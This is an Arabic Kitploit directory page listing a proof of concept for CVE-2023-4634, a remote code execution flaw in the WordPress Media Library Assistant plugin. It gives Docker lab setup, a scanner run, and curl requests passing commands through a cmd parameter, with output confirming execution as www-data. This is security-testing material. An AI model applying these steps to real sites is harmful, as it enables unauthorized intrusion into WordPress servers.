Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-4634-PoC — إثبات المفهوم لاستغلال CVE-2023-4634، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في إضافة WordPress Media Library Assistant. يتضمن بيئة ضعيفة مبنية على Docker وماسح ضوئي آلي. | Kitploit
أدوات/GitHubGitHub/evillm/cve-2023-4634-poc
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubevillm/cve-2023-4634-poc

CVE-2023-4634-PoC

إثبات المفهوم لاستغلال CVE-2023-4634، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في إضافة WordPress Media Library Assistant. يتضمن بيئة ضعيفة مبنية على Docker وماسح ضوئي آلي.

عرض المستودع
18منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-4634 - ثغرة RCE في إضافة Media Library Assistant لووردبريس

1. بناء وتشغيل البيئة

cd Stand
docker-compose up --build -d

2. انتظار بدء الخدمات (60 ثانية)

sleep 60
curl -I http://localhost:8080

3. تشغيل فحص الثغرة

cd ../PoC/src
python3 scanner.py http://localhost:8080

4. اختبار RCE يدويًا

# اختبار أمر id
curl "http://localhost:8080/rce_proof.php?cmd=id"

# اختبار أمر ping
curl "http://localhost:8080/rce_proof.php?cmd=ping+-c+2+127.0.0.1"

# إنشاء ملف الإثبات
curl "http://localhost:8080/rce_proof.php?cmd=touch+/tmp/rce_proof"

✅ النتائج المتوقعة

مخرجات scanner.py:

[*] Scanning: http://localhost:8080
[+] WordPress is accessible
[+] Plugin found: v3.09
[+] Plugin is VULNERABLE!
[*] Testing RCE...
[+] id command executed
[+] ping command executed
[+] file_check command executed
[+] RCE CONFIRMED!
[+] Results saved to ../result.txt

محتويات result.txt:

{
  "cve": "CVE-2023-4634",
  "target": "http://localhost:8080",
  "timestamp": "2025-12-21 13:49:19",
  "vulnerable": true,
  "findings": {
    "wordpress": true,
    "plugin_vulnerable": true,
    "rce_id": true,
    "rce_id_output": "uid=33(www-data) gid=33(www-data) groups=33(www-data)",
    "rce_ping": true,
    "rce_file_check": true
  },
  "plugin_version": "3.09",
  "status": "VULNERABLE"
}

🔧 المواصفات الفنية

الشبكة:

  • ووردبريس: 172.20.0.2:80 (متاح على localhost:8080)
  • قاعدة البيانات: 172.20.0.3:3306
  • الشبكة: 172.20.0.0/24

المتطلبات:

  • CVE: CVE-2023-4634
  • المكون الثغري: إضافة Media Library Assistant < 3.10
  • نوع الثغرة: تنفيذ كود عن بعد (RCE)
  • متطلبات النظام: Docker, Python 3.7+

📊 إثبات RCE

  • ✅ تنفيذ أمر id عبر HTTP
  • ✅ تنفيذ أمر ping عبر HTTP
  • ✅ إنشاء ملفات في /tmp/
  • ✅ تأكيد صلاحيات www-data
  • ✅ توثيق النتائج في result.txt

🧹 التنظيف

cd Stand
docker-compose down -v
تنزيل الأداة